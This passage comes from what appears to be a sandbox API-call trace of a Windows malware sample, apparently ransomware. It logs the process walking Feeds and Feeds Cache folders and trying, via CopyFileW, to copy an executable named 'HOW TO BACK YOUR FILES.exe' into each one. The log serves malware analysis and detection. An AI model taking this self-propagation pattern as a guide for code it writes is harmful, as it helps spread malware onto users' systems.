returned -1 [0065.997] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.997] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.997] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.997] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.002] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.002] GetLastError () returned 0x0 [0066.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.002] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.002] CloseHandle (hObject=0x154) returned 1 [0066.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.003] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.003] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.003] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.003] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.004] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.004] GetLastError () returned 0x0 [0066.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.004] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.004] CloseHandle (hObject=0x154) returned 1 [0066.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.004] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.004] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.004] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.004] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.005] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.005] GetLastError () returned 0x0 [0066.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.005] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.005] CloseHandle (hObject=0x154) returned 1 [0066.005] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.005] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.006] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.006] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.006] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.006] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.006] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.006] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.007] GetLastError () returned 0x0 [0066.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.007] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.007] CloseHandle (hObject=0x154) returned 1 [0066.007] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.007] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.007] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.007] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.007] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.007] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.007] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.008] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.008] GetLastError () returned 0x0 [0066.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.008] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.008] CloseHandle (hObject=0x154) returned 1 [0066.008] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.008] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.009] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.009] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.009] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.009] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.009] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.009] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.011] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.011] GetLastError () returned 0x0 [0066.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.011] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.011] CloseHandle (hObject=0x154) returned 1 [0066.011] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.011] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.012] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.012] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.012] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.012] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.012] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.012] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.013] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.013] GetLastError () returned 0x0 [0066.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.013] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.013] CloseHandle (hObject=0x154) returned 1 [0066.013] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.013] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.013] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.013] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.013] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.014] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.014] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.014] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.014] GetLastError () returned 0x0 [0066.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.014] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.014] CloseHandle (hObject=0x154) returned 1 [0066.015] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.015] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 